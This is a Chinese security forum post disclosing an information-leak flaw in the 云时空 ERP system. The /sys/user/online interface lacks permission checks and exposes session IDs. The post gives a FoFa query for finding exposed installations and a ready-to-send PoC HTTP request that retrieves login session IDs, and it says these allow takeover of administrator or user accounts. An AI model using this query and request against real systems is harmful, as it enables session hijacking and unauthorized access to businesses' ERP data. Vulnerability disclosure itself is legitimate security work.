云时空ERP存在信息泄露漏洞-网络安全论坛-网络安全-阻击者联盟

云时空ERP存在信息泄露漏洞

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟8个月前发布
310

云时空ERP系统online接口没有进行权限校验,导致敏感信息泄露,可以通过泄露信息获取管理员或普通用户权限。

FoFa语句:

title="云时空社会化商业ERP系统"

29759f1590804cc74f17153a795cd5fc

752c42f8aa0557e0f40df16cb83818e7

POC:

GET /sys/user/online HTTP/1.1
Host: 
accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

获取系统登陆的sessionid信息:

09346896e00e3456230962cb53a2c0e0

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面